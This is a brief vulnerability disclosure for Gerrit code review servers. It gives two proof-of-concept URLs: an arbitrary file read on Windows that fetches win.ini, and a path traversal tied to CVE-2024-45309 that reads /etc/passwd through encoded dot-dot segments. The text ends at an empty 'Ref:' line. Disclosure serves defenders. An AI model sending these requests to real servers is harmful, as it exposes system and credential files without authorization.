Gerrit 3.12.0 has an Arbitrary File Read vulnerability on Windows
#POC:
http://ip:port/static/C:/Windows/win.ini
I reported this vulnerability to the official team on July 10, 2024, and it appears it hasn't been fixed in the past year.
#CVE-2024-45309
Exposing Sensitive Data
#POC:
Assume there is a project named test.
http://ip:port/test/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Ref: